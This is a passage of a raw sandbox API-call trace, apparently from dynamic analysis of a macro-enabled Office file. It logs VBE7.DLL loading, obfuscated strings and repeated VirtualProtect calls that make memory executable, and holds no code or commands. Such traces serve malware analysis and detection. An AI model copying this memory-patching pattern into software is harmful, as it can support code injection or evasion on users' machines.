_Dst=0xb2a5170, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb2a5170) returned 0xb2a5170 [0092.942] memcpy (in: _Dst=0xb2a5174, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a5174) returned 0xb2a5174 [0092.942] memcpy (in: _Dst=0xb2a5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.943] memcpy (in: _Dst=0xb2a5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.943] memcpy (in: _Dst=0xb2a5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.943] memcpy (in: _Dst=0xb2a516c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0092.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb42ff74, cbMultiByte=11, lpWideCharStr=0x9bf16e4, cchWideChar=24 | out: lpWideCharStr="OPHmxDl8d35") returned 11 [0092.943] memcpy (in: _Dst=0xf4d54cc, _Src=0x9bf16e0, _Size=0x1c | out: _Dst=0xf4d54cc) returned 0xf4d54cc [0092.943] memcpy (in: _Dst=0xb2a5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.943] memcpy (in: _Dst=0xb2a5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.943] memcpy (in: _Dst=0xb2a5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.943] memcpy (in: _Dst=0xb2a516c, _Src=0x197894, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0092.944] memcpy (in: _Dst=0xb2a516c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0092.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a409ee, cbMultiByte=8, lpWideCharStr=0x197658, cchWideChar=7 | out: lpWideCharStr="Remove") returned 0 [0092.945] wcscpy_s (in: _Destination=0xf4d54ec, _SizeInWords=0x7, _Source="Remove" | out: _Destination="Remove") returned 0x0 [0092.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb42ff9c, cbMultiByte=8, lpWideCharStr=0x9bf225c, cchWideChar=18 | out: lpWideCharStr="FBwW10dy") returned 8 [0092.945] CRetailMalloc_Alloc () returned 0xf4d3f88 [0092.946] memcpy (in: _Dst=0xf4d3f9c, _Src=0x9bf2258, _Size=0x16 | out: _Dst=0xf4d3f9c) returned 0xf4d3f9c [0092.946] memcpy (in: _Dst=0xb2a5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.946] memcpy (in: _Dst=0xb2a5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.946] memcpy (in: _Dst=0xb2a5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.946] memcpy (in: _Dst=0xb2a516c, _Src=0x197894, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0092.946] memcpy (in: _Dst=0xb2a516c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0092.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a409ee, cbMultiByte=8, lpWideCharStr=0x197658, cchWideChar=7 | out: lpWideCharStr="Remove") returned 0 [0092.946] memcpy (in: _Dst=0xb2a5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.946] memcpy (in: _Dst=0xb2a516c, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0092.947] CRetailMalloc_Alloc () returned 0xf4d7868 [0092.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6961ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0092.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6961ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0092.950] memcpy (in: _Dst=0xf4b205c, _Src=0x197ac4, _Size=0x18 | out: _Dst=0xf4b205c) returned 0xf4b205c [0092.950] CRetailMalloc_Realloc () returned 0xf4b1df0 [0092.950] CRetailMalloc_Free () returned 0x1 [0092.952] GetCurrentProcess () returned 0xffffffff [0092.952] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0092.952] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0092.953] GetCurrentProcess () returned 0xffffffff [0092.954] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0092.954] GetCurrentProcess () returned 0xffffffff [0092.954] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0092.954] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0092.954] GetCurrentProcess () returned 0xffffffff [0092.954] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0092.955] GetCurrentProcess () returned 0xffffffff [0092.955] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0092.955] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0092.956] GetCurrentProcess () returned 0xffffffff [0092.956] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0092.956] GetCurrentProcess () returned 0xffffffff [0092.956] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0092.956] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0092.957] GetCurrentProcess () returned 0xffffffff [0092.957] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0092.957] GetCurrentProcess () returned 0xffffffff [0092.957] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0092.957] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0092.957] GetCurrentProcess () returned 0xffffffff [0092.958] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0092.958] GetCurrentProcess () returned 0xffffffff [0092.958] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0092.958] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0092.958] GetCurrentProcess () returned 0xffffffff [0092.958] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0092.958] GetCurrentProcess () returned 0xffffffff [0092.958] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0092.959] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0092.959] GetCurrentProcess () returned 0xffffffff [0092.959] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0092.959] GetCurrentProcess () returned 0xffffffff [0092.959] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0092.959] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0092.960] GetCurrentProcess () returned 0xffffffff [0092.960] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0092.960] GetCurrentProcess () returned 0xffffffff [0092.960] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0092.960] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0092.961] GetCurrentProcess () returned 0xffffffff [0092.961] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0092.961] GetCurrentProcess () returned 0xffffffff [0092.961] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0092.961] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0092.962] GetCurrentProcess () returned 0xffffffff [0092.963] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0092.963] GetCurrentProcess () returned 0xffffffff [0092.963] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0092.963] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0092.963] GetCurrentProcess () returned 0xffffffff [0092.963] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0092.964] GetCurrentProcess () returned 0xffffffff [0092.964] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0092.964] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0092.964] GetCurrentProcess () returned 0xffffffff [0092.964] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0092.964] GetCurrentProcess () returned 0xffffffff [0092.964] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0092.965] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0092.965] GetCurrentProcess () returned 0xffffffff [0092.965] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0092.965] GetCurrentProcess () returned 0xffffffff [0092.965] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0092.965] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0092.970] GetCurrentProcess () returned 0xffffffff [0092.970] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0092.970] GetCurrentProcess () returned 0xffffffff [0092.970] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0092.972] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0092.975] GetCurrentProcess () returned 0xffffffff [0092.975] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0092.977] GetCurrentProcess () returned 0xffffffff [0092.977] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0092.978] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0092.983] GetCurrentProcess () returned 0xffffffff [0092.983] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0092.983] GetCurrentProcess () returned 0xffffffff [0092.985] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0092.985] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0092.988] GetCurrentProcess () returned 0xffffffff [0092.988] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0092.988] GetCurrentProcess () returned 0xffffffff [0092.990] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0092.990] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0092.993] GetCurrentProcess () returned 0xffffffff [0092.993] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0092.993] GetCurrentProcess () returned 0xffffffff [0092.995] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0092.995] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0092.999] GetCurrentProcess () returned 0xffffffff [0092.999] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0092.999] GetCurrentProcess () returned 0xffffffff [0093.001] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0093.001] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0093.004] GetCurrentProcess () returned 0xffffffff [0093.004] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0093.004] GetCurrentProcess () returned 0xffffffff [0093.004] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0093.009] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0093.012] GetCurrentProcess () returned 0xffffffff [0093.012] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0093.012] GetCurrentProcess () returned 0xffffffff [0093.015] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0093.015] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0093.016] GetCurrentProcess () returned 0xffffffff [0093.016] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0093.016] GetCurrentProcess () returned 0xffffffff [0093.017] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0093.017] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0093.017] GetCurrentProcess () returned 0xffffffff [0093.017] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0093.017] GetCurrentProcess () returned 0xffffffff [0093.018] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0093.018] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0093.018] GetCurrentProcess () returned 0xffffffff [0093.018] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0093.018] GetCurrentProcess () returned 0xffffffff [0093.018] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0093.018] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0093.019] GetCurrentProcess () returned 0xffffffff [0093.019] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0093.019] GetCurrentProcess () returned 0xffffffff [0093.019] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0093.019] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0093.020] GetCurrentProcess () returned 0xffffffff [0093.020] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0093.020] GetCurrentProcess () returned 0xffffffff [0093.020] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0093.020] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0093.021] GetCurrentProcess () returned 0xffffffff [0093.021] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0093.021] GetCurrentProcess () returned 0xffffffff [0093.021] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0093.021] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0093.022] GetCurrentProcess () returned 0xffffffff [0093.022] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0093.022] GetCurrentProcess () returned 0xffffffff [0093.022] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0093.022] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0093.022] GetCurrentProcess () returned 0xffffffff [0093.022] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0093.022] GetCurrentProcess () returned 0xffffffff [0093.023] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0093.023] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0093.023] GetCurrentProcess () returned 0xffffffff [0093.024] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0093.024] GetCurrentProcess () returned 0xffffffff [0093.024] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0093.024] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0093.024] GetCurrentProcess () returned 0xffffffff [0093.024] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0093.024] SetErrorMode (uMode=0x8001) returned 0x8001 [0093.026] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0093.026] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x693e0000 [0093.027] SetErrorMode (uMode=0x8001) returned 0x8001 [0093.028] GetProcAddress (hModule=0x693e0000, lpProcName=0x284) returned 0x69415c5c [0093.028] GetCurrentProcess () returned 0xffffffff [0093.028] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d458c, dwSize=0x19) returned 1 [0093.028] VirtualProtect (in: lpAddress=0xf4d458c, dwSize=0x19, flNewProtect=0x40, lpflOldProtect=0x197788 | out: lpflOldProtect=0x197788*=0x4) returned 1 [0093.029] GetCurrentProcess () returned 0xffffffff [0093.029] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d3320, dwSize=0x19) returned 1 [0093.029] VirtualProtect (in: lpAddress=0xf4d3320, dwSize=0x19, flNewProtect=0x40, lpflOldProtect=0x197788 | out: lpflOldProtect=0x197788*=0x4) returned 1 [0093.030] GetCurrentProcess () returned 0xffffffff [0093.030] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d32c4, dwSize=0x19) returned 1 [0093.030] VirtualProtect (in: lpAddress=0xf4d32c4, dwSize=0x19, flNewProtect=0x40, lpflOldProtect=0x197788 | out: lpflOldProtect=0x197788*=0x40) returned 1 [0093.031] GetAsyncKeyState (vKey=3) returned 0 [0093.032] CRetailMalloc_Alloc () returned 0xf4b20d0 [0093.032] memcpy (in: _Dst=0xb2a5168, _Src=0x1978dc, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.032] memcpy (in: _Dst=0xf4b20f0, _Src=0x197944, _Size=0x18 | out: _Dst=0xf4b20f0) returned 0xf4b20f0 [0093.032] CRetailMalloc_Realloc () returned 0xf4b20d0 [0093.032] CRetailMalloc_Free () returned 0x1 [0093.032] GetCurrentProcess () returned 0xffffffff [0093.032] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0093.032] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.033] GetCurrentProcess () returned 0xffffffff [0093.033] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0093.033] GetCurrentProcess () returned 0xffffffff [0093.033] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0093.033] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.034] GetCurrentProcess () returned 0xffffffff [0093.034] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0093.034] GetCurrentProcess () returned 0xffffffff [0093.034] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0093.034] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.035] GetCurrentProcess () returned 0xffffffff [0093.035] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0093.035] GetCurrentProcess () returned 0xffffffff [0093.035] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0093.035] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.036] GetCurrentProcess () returned 0xffffffff [0093.036] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0093.036] GetCurrentProcess () returned 0xffffffff [0093.036] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0093.036] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.036] GetCurrentProcess () returned 0xffffffff [0093.036] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0093.036] GetCurrentProcess () returned 0xffffffff [0093.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0093.037] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.037] GetCurrentProcess () returned 0xffffffff [0093.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0093.037] GetCurrentProcess () returned 0xffffffff [0093.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0093.037] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.038] GetCurrentProcess () returned 0xffffffff [0093.038] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0093.038] GetCurrentProcess () returned 0xffffffff [0093.038] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0093.038] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.039] GetCurrentProcess () returned 0xffffffff [0093.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0093.039] GetCurrentProcess () returned 0xffffffff [0093.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0093.039] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.040] GetCurrentProcess () returned 0xffffffff [0093.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0093.040] GetCurrentProcess () returned 0xffffffff [0093.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0093.040] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.041] GetCurrentProcess () returned 0xffffffff [0093.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0093.041] GetCurrentProcess () returned 0xffffffff [0093.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0093.041] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.041] GetCurrentProcess () returned 0xffffffff [0093.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0093.041] GetCurrentProcess () returned 0xffffffff [0093.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0093.042] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.042] GetCurrentProcess () returned 0xffffffff [0093.042] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0093.042] GetCurrentProcess () returned 0xffffffff [0093.042] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0093.042] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.043] GetCurrentProcess () returned 0xffffffff [0093.043] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0093.043] GetCurrentProcess () returned 0xffffffff [0093.043] FlushInstructionCache (hProcess=0xffffffff, 